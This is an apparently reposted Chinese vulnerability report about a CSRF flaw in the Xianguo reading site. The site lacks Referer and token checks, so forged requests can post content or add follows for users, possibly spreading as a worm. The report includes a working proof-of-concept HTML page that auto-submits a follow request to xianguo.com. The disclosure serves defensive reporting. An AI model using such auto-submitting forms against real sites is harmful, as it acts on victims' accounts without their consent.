鲜果网某处CSRF漏洞能蔓延蠕虫
发布时间:2022-04-30 10:30:58 所属栏目:安全 来源:互联网
导读:鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等! 详细说明:在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。 html body form id=imlo
鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等! 详细说明:在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。 <html> <body> <form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post"> <input type="text" name="beingsIds" value="1378148" /> <input type="text" name="parentId" value="0" /> <input type="text" name="ftype" value="0" /> </form> <script> document.imlonghao.submit(); </script> </body> </html> (编辑:江门站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐